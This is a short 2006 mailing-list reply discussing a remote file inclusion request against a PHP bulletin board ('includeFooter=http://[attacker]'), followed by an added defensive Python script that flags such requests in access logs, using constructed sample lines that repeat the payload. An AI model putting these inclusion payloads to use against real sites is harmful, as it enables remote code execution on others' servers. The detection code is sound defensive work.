funsec mailing list archives
Re: interesting attack
From: Valdis.Kletnieks () vt edu
Date: Wed, 19 Apr 2006 14:17:39 -0400
On Wed, 19 Apr 2006 12:33:05 CDT, Technocrat said:
> On 4/14/06, Peter Kosinar <goober () nuf ksp sk> wrote:
> > GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1
>
> Without researching it, I would guess that it is a command/script injection attack in a PHP based BB system. Looks like she is using a poor file handler for the injection. Again, this is without research.

And it's a skript kiddie doing it, as they forgot to fix the [attacker] to "your website here",,,, :)

I saw a spam recently with a 'From: youruserid () yourspamsite com'.

"D'oh!" -- H. Simpson
_______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
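
A defender's view of the request quoted in this thread, as an added example that is not part of the original post: a scan of web access log lines for query parameters whose value decodes to a remote URL, the pattern seen in `includeFooter=http://[attacker]`. The log lines, addresses and `host.example` are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample log lines (documentation addresses, made-up host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Apr/2006:12:00:01 -0400] "GET /minibb/index.php?action=vthread&forum=1 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [19/Apr/2006:12:00:07 -0400] "GET /minibb/bb_admin.php?includeFooter=http://[attacker] HTTP/1.1" 404 312',
    '192.0.2.66 - - [19/Apr/2006:12:00:09 -0400] "GET /minibb/bb_admin.php?includeFooter=http%253A%252F%252Fhost.example%252Ff.txt HTTP/1.1" 404 312',
    '192.0.2.10 - - [19/Apr/2006:12:00:15 -0400] "GET /search.php?q=how+to+use+http HTTP/1.1" 200 900',
]

# Request line inside an access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL.
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def remote_url_params(target):
    """Return (name, decoded_value) for parameters whose value is a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl percent-decodes once; decode again to catch double encoding.
        decoded = unquote(value)
        if REMOTE_URL_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Yield (line_number, path, parameter, value) for each suspicious request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a parseable request line
        target = match.group("target")
        for name, value in remote_url_params(target):
            yield number, urlsplit(target).path, name, value


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Parameters that legitimately carry URLs, such as redirect targets, match as well, so hits are a triage list rather than a verdict.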